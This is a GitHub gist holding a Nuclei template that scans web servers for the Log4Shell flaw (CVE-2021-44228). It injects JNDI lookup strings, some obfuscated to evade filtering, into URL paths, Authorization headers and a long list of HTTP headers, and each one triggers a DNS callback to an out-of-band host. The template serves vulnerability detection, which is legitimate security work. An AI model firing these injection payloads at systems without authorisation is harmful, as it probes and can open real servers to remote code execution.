Skip to content

Instantly share code, notes, and snippets.

@hazcod
Last active December 18, 2023 06:50
Show Gist options
  • Save hazcod/f6b2d3f8a3bc3eb95a137bcd6d144a38 to your computer and use it in GitHub Desktop.
Save hazcod/f6b2d3f8a3bc3eb95a137bcd6d144a38 to your computer and use it in GitHub Desktop.
Nuclei template to scan for log4shell (CVE-2021-44228).
id: CVE-2021-44228
info:
name: Log4J RCE
author: iNvist / hazcod
severity: critical
description: CVE-2021-44228
requests:
- raw:
- |
GET /{{Path}}${jndi:dns://{{interactsh-url}}:80/d HTTP/1.1
Host: {{Hostname}}
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- raw:
- |
GET //{{Path}}${jndi:dns://{{interactsh-url}}:80/d HTTP/1.1
Host: {{Hostname}}
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- raw:
- |
GET /{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d HTTP/1.1
Host: {{Hostname}}
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- raw:
- |
GET //{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d HTTP/1.1
Host: {{Hostname}}
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
# TODO maybe encoding
- raw:
- |
GET /{{Path}}?${${lower:jn}di:${lower:dn}s:://{{interactsh-url}}:80/d HTTP/1.1
Host: {{Hostname}}
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- raw:
- |
GET /{{Path}} HTTP/1.1
Host: {{Hostname}}
Authorization: {{auth_type }} ${jndi:dns://{{interactsh-url}}:80/o
payloads:
auth_type:
- Bearer
- Oauth
- Token
- Basic
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- raw:
- |
GET //{{Path}} HTTP/1.1
Host: {{Hostname}}
Authorization: {{auth_type }} ${jndi:dns://{{interactsh-url}}:80/o
payloads:
auth_type:
- Bearer
- Oauth
- Token
- Basic
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- raw:
- |
GET /{{Path}} HTTP/1.1
Host: {{Hostname}}
Authorization: {{auth_type }} ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o
payloads:
auth_type:
- Bearer
- Oauth
- Token
- Basic
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- "JRMP"
- raw:
- |
GET /{{Path}} HTTP/1.1
Host: {{Hostname}}
§header_val§: ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o
payloads:
header_val:
- Accept
- Accept-Charset
- Accept-Datetime
- Accept-Encoding
- Accept-Language
- Alt-Svc
- Base-Url
- CF-Connecting-IP
- Cache-Control
- Client-IP
- Cluster
- Cluster-Client-IP
- Connection
- Contact
- Content-Length
- Content-MD5
- Content-Type
- Cookie
- DNT
- Date
- Destination
- Expect
- Forwarded
- From
- Front-End-Https
- HTTP_CLIENT_IP
- HTTP_FORWARDED
- HTTP_FORWARDED_FOR
- HTTP_X_FORWARDED
- HTTP_X_FORWARDED_FOR
- Host
- Http-Url
- If-Match
- If-Modified-Since
- If-None-Match
- If-Range
- If-Unmodified-Since
- Link
- Location
- Max-Forwards
- Origin
- Pragma
- Profile
- Proxy
- Proxy-Authorization
- Proxy-Connection
- Proxy-Host
- Proxy-Url
- Range
- Real-IP
- Redirect
- Referer
- Referrer
- Refferer
- Request-Uri
- TE
- True-Client-IP
- UID
- Upgrade
- Uri
- User-Agent
- Via
- Warning
- X-ATT-DeviceId
- X-Arbitrary
- X-CSRFToken
- X-Client-IP
- X-Cluster-Client-IP
- X-Correlation-ID
- X-Csrf-Token
- X-Do-Not-Track
- X-Forward-For
- X-Forwarded
- X-Forwarded-By
- X-Forwarded-For
- X-Forwarded-For-IP
- X-Forwarded-For-Original
- X-Forwarded-Host
- X-Forwarded-Proto
- X-Forwarded-Server
- X-Forwarder-For
- X-Host
- X-Http-Destinationurl
- X-Http-Host-Override
- X-Http-Method-Override
- X-Original-Remote-Addr
- X-Original-Url
- X-Originating-IP
- X-Proxy-Url
- X-ProxyUser-IP
- X-Real-IP
- X-Remote-Addr
- X-Remote-IP
- X-Request-ID
- X-Requested-With
- X-Rewrite-Url
- X-True-IP
- X-UIDH
- X-Wap-Profile
- X-XSRF-TOKEN
attack: clusterbomb
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- raw:
- |
GET /{{Path}} HTTP/1.1
Host: {{Hostname}}
§header_val§: ${jndi:dns://{{interactsh-url}}:80/o
payloads:
header_val:
- Accept
- Accept-Charset
- Accept-Datetime
- Accept-Encoding
- Accept-Language
- Alt-Svc
- Base-Url
- CF-Connecting-IP
- Cache-Control
- Client-IP
- Cluster
- Cluster-Client-IP
- Connection
- Contact
- Content-Length
- Content-MD5
- Content-Type
- Cookie
- DNT
- Date
- Destination
- Expect
- Forwarded
- From
- Front-End-Https
- HTTP_CLIENT_IP
- HTTP_FORWARDED
- HTTP_FORWARDED_FOR
- HTTP_X_FORWARDED
- HTTP_X_FORWARDED_FOR
- Host
- Http-Url
- If-Match
- If-Modified-Since
- If-None-Match
- If-Range
- If-Unmodified-Since
- Link
- Location
- Max-Forwards
- Origin
- Pragma
- Profile
- Proxy
- Proxy-Authorization
- Proxy-Connection
- Proxy-Host
- Proxy-Url
- Range
- Real-IP
- Redirect
- Referer
- Referrer
- Refferer
- Request-Uri
- TE
- True-Client-IP
- UID
- Upgrade
- Uri
- User-Agent
- Via
- Warning
- X-ATT-DeviceId
- X-Arbitrary
- X-CSRFToken
- X-Client-IP
- X-Cluster-Client-IP
- X-Correlation-ID
- X-Csrf-Token
- X-Do-Not-Track
- X-Forward-For
- X-Forwarded
- X-Forwarded-By
- X-Forwarded-For
- X-Forwarded-For-IP
- X-Forwarded-For-Original
- X-Forwarded-Host
- X-Forwarded-Proto
- X-Forwarded-Server
- X-Forwarder-For
- X-Host
- X-Http-Destinationurl
- X-Http-Host-Override
- X-Http-Method-Override
- X-Original-Remote-Addr
- X-Original-Url
- X-Originating-IP
- X-Proxy-Url
- X-ProxyUser-IP
- X-Real-IP
- X-Remote-Addr
- X-Remote-IP
- X-Request-ID
- X-Requested-With
- X-Rewrite-Url
- X-True-IP
- X-UIDH
- X-Wap-Profile
- X-XSRF-TOKEN
attack: clusterbomb
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment